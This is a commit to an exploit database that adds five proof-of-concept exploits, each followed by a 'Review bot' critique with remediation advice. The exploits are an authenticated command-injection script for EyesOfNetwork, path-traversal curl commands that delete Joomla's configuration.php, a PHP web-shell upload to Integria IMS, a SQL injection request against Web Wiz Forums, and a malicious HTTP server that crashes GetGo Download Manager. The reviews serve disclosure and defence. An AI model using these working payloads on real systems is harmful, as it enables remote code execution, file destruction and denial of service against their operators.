
Commit 2c0d2ff

author
Offensive Security
committed
DB: 2019-08-17
5 changes to exploits/shellcodes

GetGo Download Manager 6.2.2.3300 - Denial of Service
EyesOfNetwork 5.1 - Authenticated Remote Command Execution
Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
Integria IMS 5.0.86 - Arbitrary File Upload
Web Wiz Forums 12.01 - 'PF' SQL Injection
1 parent ab63879 commit 2c0d2ff

6 files changed

Lines changed: 284 additions & 0 deletions

exploits/asp/webapps/47284.txt

Lines changed: 19 additions & 0 deletions
@@ -0,0 +1,19 @@
1+
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
2+
# Date: 2019-09-16
3+
# Exploit Author: n1x_ [MS-WEB]
4+
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
5+
# Version: 12.01
6+
# Tested on Windows
7+
8+
# Vulnerable parameter: PF (member_profile.asp)
9+
# GET Request
10+
11+
GET /member_profile.asp?PF=10' HTTP/1.1
12+
Host: host
13+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
14+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
15+
Accept-Language: en-US,en;q=0.5
16+
Accept-Encoding: gzip, deflate
17+
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
18+
Connection: close
19+
Upgrade-Insecure-Requests: 1
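Review bot: the single request on the `GET /member_profile.asp?PF=10'` line is the only evidence offered, and nothing in the hunk shows the response that would distinguish an injection from a plain error page (database error text, or a boolean or time-based differential), so the finding is unverified as written; a reviewer would ask for the observed response. The header block also dates the entry `2019-09-16`, a month after this DB commit, and `# Tested on Windows` is missing the colon the other entries use. For defenders, the remediation for a finding of this type is passing `PF` to the database as a bound parameter rather than building the query from the request value, and the `Cookie:` line carries session identifiers that should be replaced with placeholders before publication.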

exploits/php/webapps/47280.py

Lines changed: 77 additions & 0 deletions
@@ -0,0 +1,77 @@
1+
# Exploit Title: EyesOfNetwork 5.1 - Authenticated Remote Command Execution
2+
# Google Dork: N/A
3+
# Date: 2019-08-14
4+
# Exploit Author: Nassim Asrir
5+
# Vendor Homepage: https://www.eyesofnetwork.com/
6+
# Software Link: https://www.eyesofnetwork.com/?page_id=48&lang=fr
7+
# Version: 5.1 < 5.0
8+
# Tested on: Windows 10
9+
# CVE : N/A
10+
11+
#About The Product:
12+
13+
''' EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application.
14+
EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance.
15+
EyesOfNetwork Supervision provides event management, availability, problems and capacity.
16+
#Technical Analysis:
17+
EyesOfNetwork allows Remote Command Execution via shell metacharacters in the module/tool_all/ host field.
18+
By looking into tools/snmpwalk.php we will find the vulnerable part of code:
19+
else{
20+
$command = "snmpwalk -c $snmp_community -v $snmp_version $host_name";
21+
}
22+
in this line we can see as the attacker who control the value of "$host_name" variable .
23+
And after that we have the magic function "popen" in the next part of code.
24+
$handle = popen($command,'r');
25+
echo "<p>";<br />
26+
while($read = fread($handle,100)){
27+
echo nl2br($read);
28+
flush();
29+
}
30+
pclose($handle);
31+
And now we can see the use of "popen" function that execute the $command's value and if we set a shell metacharacters ";" in the end of the command we will be able to execute OS command.'''
32+
33+
#Exploit
34+
35+
import requests
36+
import optparse
37+
import sys
38+
import bs4 as bs
39+
40+
commandList = optparse.OptionParser('usage: %prog -t https://target:443 -u admin -p pwd -c "ls"')
41+
commandList.add_option('-t', '--target', action="store",
42+
help="Insert TARGET URL",
43+
)
44+
commandList.add_option('-c', '--cmd', action="store",
45+
help="Insert command name",
46+
)
47+
commandList.add_option('-u', '--user', action="store",
48+
help="Insert username",
49+
)
50+
commandList.add_option('-p', '--pwd', action="store",
51+
help="Insert password",
52+
)
53+
options, remainder = commandList.parse_args()
54+
55+
if not options.target or not options.cmd or not options.user or not options.pwd:
56+
57+
commandList.print_help()
58+
sys.exit(1)
59+
60+
61+
url = options.target
62+
cmd = options.cmd
63+
user = options.user
64+
pwd = options.pwd
65+
66+
with requests.session() as c:
67+
link=url
68+
initial=c.get(link)
69+
login_data={"login":user,"mdp":pwd}
70+
page_login=c.post(str(link)+"/login.php", data=login_data)
71+
v_url=link+"/module/tool_all/select_tool.php"
72+
v_data = {"page": "bylistbox", "host_list": "127.0.0.1;"+cmd, "tool_list": "tools/snmpwalk.php", "snmp_com": "mm", "snmp_version": "2c", "min_port": "1", "max_port": "1024", "username": '', "password": '', "snmp_auth_protocol": "MD5", "snmp_priv_passphrase": '', "snmp_priv_protocol": '', "snmp_context": ''}
73+
page_v=c.post(v_url, data=v_data)
74+
my=bs.BeautifulSoup(page_v.content, "lxml")
75+
for textarea in my.find_all('p'):
76+
final = textarea.get_text()
77+
print final
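Review bot: the script posts the command without checking that `page_login` actually authenticated (no status or content check after the `c.post(str(link)+"/login.php", ...)` line), so a wrong password yields an empty or misleading `<p>` dump rather than an error; it is also Python 2 only (`print final`), and with the `https://target:443` usage string a self-signed certificate will make `requests` raise unless `verify` is handled. The header `# Version: 5.1 < 5.0` is not a valid range and should state the affected versions plainly, and the `echo "<p>";<br />` line in the quoted source carries an HTML `<br />` from the copy. On the code side, the root cause shown is `$host_name` reaching `popen()` by string interpolation into the `snmpwalk` command; the fix is `escapeshellarg()` on each interpolated value, or validating the host against a hostname/IP pattern before `$command` is built.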

exploits/php/webapps/47281.txt

Lines changed: 99 additions & 0 deletions
@@ -0,0 +1,99 @@
1+
# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
2+
# Dork: inurl:"index.php?option=com_jsjobs"
3+
# Date: 2019-08-16
4+
# Exploit Author: qw3rTyTy
5+
# Vendor Homepage: https://www.joomsky.com/
6+
# Software Link: https://www.joomsky.com/5/download/1
7+
# Version: 1.2.6
8+
# Tested on: Debian/nginx/joomla 3.9.0
9+
10+
# Vulnerability details:
11+
# This vulnerability is caused when processing custom userfield.
12+
13+
File: site/models/job.php
14+
Function: storeJob
15+
Line: 1240
16+
-------------------------------------
17+
18+
1215 //custom field code start
19+
1216 $customflagforadd = false;
20+
1217 $customflagfordelete = false;
21+
1218 $custom_field_namesforadd = array();
22+
1219 $custom_field_namesfordelete = array();
23+
1220 $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);
24+
1221 $params = array();
25+
1222 $forfordelete = '';
26+
1223
27+
1224 foreach ($userfield AS $ufobj) {
28+
1225 $vardata = '';
29+
1226 if($ufobj->userfieldtype == 'file'){
30+
1227 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){
31+
1228 $vardata = $data[$ufobj->field.'_2'];
32+
1229 }else{
33+
1230 $vardata = $_FILES[$ufobj->field]['name'];
34+
1231 }
35+
1232 $customflagforadd=true;
36+
1233 $custom_field_namesforadd[]=$ufobj->field;
37+
1234 }else{
38+
1235 $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';
39+
1236 }
40+
1237 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
41+
1238 $customflagfordelete = true;
42+
1239 $forfordelete = $ufobj->field;
43+
1240 $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //No check.
44+
1241 }
45+
...snip...
46+
1323 // new
47+
1324 //removing custom field
48+
1325 if($customflagfordelete == true){
49+
1326 foreach ($custom_field_namesfordelete as $key) {
50+
1327 $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2); //!!!
51+
1328 }
52+
1329 }
53+
54+
File: site/models/common.php
55+
Function: uploadOrDeleteFileCustom
56+
Line: 851
57+
-------------------------------------
58+
59+
748 $path = $base . '/' . $datadirectory;
60+
749 if (!file_exists($path)) { // create user directory
61+
750 $this->makeDir($path);
62+
751 }
63+
752 $isupload = false;
64+
753 $path = $path . '/data';
65+
754 if (!file_exists($path)) { // create user directory
66+
755 $this->makeDir($path);
67+
756 }
68+
757 if($for == 3 )
69+
758 $path = $path . '/jobseeker';
70+
759 else
71+
760 $path = $path . '/employer';
72+
761
73+
762 if (!file_exists($path)) { // create user directory
74+
763 $this->makeDir($path);
75+
764 }
76+
...snip...
77+
843 } else { // DELETE FILES
78+
844 if ($isdeletefile == 1) {
79+
845 if($for == 3){
80+
846 $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';
81+
847 }else{
82+
848 $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';
83+
849 }
84+
850 $file = $userpath.$field;
85+
851 unlink($file); //!!!
86+
852 }
87+
853 return 1;
88+
854 }
89+
855 }
90+
91+
#####################################
92+
#PoC:
93+
#####################################
94+
95+
# If an administrator has added custom userfield 'ufield926' as field type 'file', attacker are can trigger this vulnerability by send a following requests.
96+
97+
$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"
98+
99+
$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"
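Review bot: the missing check is on the line marked `//No check.` (1240): `$data[$ufobj->field.'_2']` is taken straight from the request, later concatenated as `$userpath.$field` and handed to `unlink()` at 851 with no `basename()` or path containment, which is exactly what the second curl's `ufield926_2=../../../../../configuration.php` exercises. The fix is to reduce the value with `basename()` and confirm with `realpath()` that the result stays inside the job's `customfiles/` directory, and preferably to resolve the file to delete from the stored field record rather than from user input. One thing to verify in the PoC: both curl commands send `-F 'options=com_jsjobs'`, whereas Joomla routes components on the `option` parameter, so the requests as written may not reach `com_jsjobs`. The sentence `attacker are can trigger this vulnerability by send a following requests` also needs a grammar pass.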

exploits/php/webapps/47283.txt

Lines changed: 45 additions & 0 deletions
@@ -0,0 +1,45 @@
1+
# Exploit Title: Integria IMS 5.0.86 - Arbitrary File Upload
2+
# Date: 2019-08-16
3+
# Exploit Author: Greg.Priest
4+
# Vendor Homepage: https://integriaims.com/
5+
# Software Link: https://sourceforge.net/projects/integria/files/5.0.86/
6+
# Version: Integria IMS 5.0.86
7+
# Tested on: Windows
8+
# CVE : N/A
9+
10+
# ---------------------------------------------------------------------------------------
11+
# http://10.61.184.30/integria//index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
12+
# ---------------------------------------------------------------------------------------
13+
14+
# [Description]
15+
# filemgr.php in Integria IMS 5.0.86, allows arbitrary file upload.
16+
# index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
17+
# ---------------------------------------------------------------------------------------
18+
19+
POST /integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload HTTP/1.1
20+
Host: 10.61.184.30
21+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
22+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
23+
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
24+
Accept-Encoding: gzip, deflate
25+
Referer: http://10.61.184.30/integria/index.php?sec=wiki&sec2=operation/wiki/wiki&action=upload
26+
Content-Type: multipart/form-data; boundary=---------------------------30333176734664
27+
Content-Length: 374
28+
Connection: close
29+
Cookie: PHPSESSID=1d31d410e9b85f1e9aaa53a2616a550e
30+
Upgrade-Insecure-Requests: 1
31+
32+
-----------------------------30333176734664
33+
Content-Disposition: form-data; name="curdir"
34+
35+
36+
-----------------------------30333176734664
37+
Content-Disposition: form-data; name="file"; filename="whoami.php"
38+
Content-Type: application/octet-stream
39+
40+
<?php
41+
$output = shell_exec('whoami');
42+
echo "<pre>$output</pre>";
43+
?>
44+
45+
-----------------------------30333176734664--
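Review bot: the advisory shows only the upload request, not the response or the path the file lands at, so nothing in the hunk demonstrates that `whoami.php` is reachable and executed rather than merely stored; a reviewer would want the stored location and the resulting `<pre>` output. The `# Version:` line repeats the product name, the reference URL contains a doubled slash (`integria//index.php`), and the request carries a live-looking internal host `10.61.184.30` and a `PHPSESSID` that should be replaced with placeholders. For the vendor, `filemgr.php` should restrict uploads to an extension allow-list and store them where the web server does not execute scripts.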
exploits/windows_x86-64/dos/47282.txt

Lines changed: 39 additions & 0 deletions
@@ -0,0 +1,39 @@
1+
# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
2+
# Date: 2019-08-15
3+
# Author - Malav Vyas
4+
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
5+
# Vendor Home Page: www.getgosoft.com
6+
# Software Link: http://www.getgosoft.com/getgodm/
7+
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
8+
# Attack Type : Remote
9+
# Impact : DoS
10+
# Co-author - Velayuthm Selvaraj
11+
12+
# 1. Description
13+
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and
14+
# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response.
15+
16+
# 2. Proof of Concept
17+
18+
import socket
19+
from time import sleep
20+
host = "192.168.0.112"
21+
port = 80
22+
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23+
sock.bind((host, port))
24+
sock.listen(1)
25+
print "\n[+] Listening on %d ..." % port
26+
27+
cl, addr = sock.accept()
28+
print "[+] Connected to %s" % addr[0]
29+
evilbuffer = "A" * 6000
30+
31+
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"
32+
33+
print cl.recv(1000)
34+
cl.send(buffer)
35+
print "[+] Sending buffer: OK\n"
36+
37+
sleep(30)
38+
cl.close()
39+
sock.close()
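Review bot: the description line `could allow Remote NAS HTTP servers to perfor DOS` has a typo (`perform`) and the `NAS` qualifier is unexplained; the PoC then only shows that a 6000-byte status line crashes the client, with no debugger output, faulting module or register state, so the `buffer overflow` classification is asserted rather than shown. The listener is Python 2 only (`print` statements) and binds to the hard-coded `192.168.0.112` rather than `0.0.0.0`, so it needs editing before it can be reproduced in a lab. The header date `2019-08-15` also differs from the `2019-08-16` recorded for this entry in `files_exploits.csv`.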

files_exploits.csv

Lines changed: 5 additions & 0 deletions
@@ -6549,6 +6549,7 @@ id,file,description,date,author,type,platform,port
65496549
47277,exploits/windows/dos/47277.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
65506550
47278,exploits/windows/dos/47278.txt,"Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-08-15,"Google Security Research",dos,windows,
65516551
47279,exploits/windows/dos/47279.txt,"Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream",2019-08-15,"Google Security Research",dos,windows,
6552+
47282,exploits/windows_x86-64/dos/47282.txt,"GetGo Download Manager 6.2.2.3300 - Denial of Service",2019-08-16,"Malav Vyas",dos,windows_x86-64,
65526553
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
65536554
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
65546555
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
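Review bot: the new `47282` row is dated `2019-08-16` while the exploit file's own header says `# Date: 2019-08-15`; one of the two should be corrected so the index and the file agree. The row is otherwise consistent with the file (`Malav Vyas`, `dos`, `windows_x86-64`), though the co-author named in the file header is not carried into the `author` column.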
@@ -41641,3 +41642,7 @@ id,file,description,date,author,type,platform,port
4164141642
47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80
4164241643
47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows,
4164341644
47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,
41645+
47280,exploits/php/webapps/47280.py,"EyesOfNetwork 5.1 - Authenticated Remote Command Execution",2019-08-16,"Nassim Asrir",webapps,php,
41646+
47281,exploits/php/webapps/47281.txt,"Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion",2019-08-16,qw3rTyTy,webapps,php,
41647+
47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php,
41648+
47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp,
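Review bot: two of the four new rows disagree with their file headers on date: `47284` records `2019-08-16` but the file reads `# Date: 2019-09-16`, and `47280` records `2019-08-16` but the file reads `# Date: 2019-08-14`; the author for `47284` is also shortened to `n1x_` from `n1x_ [MS-WEB]`. The mismatches should be resolved before the index is relied on; the `47281` and `47283` rows match their files on date and author.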
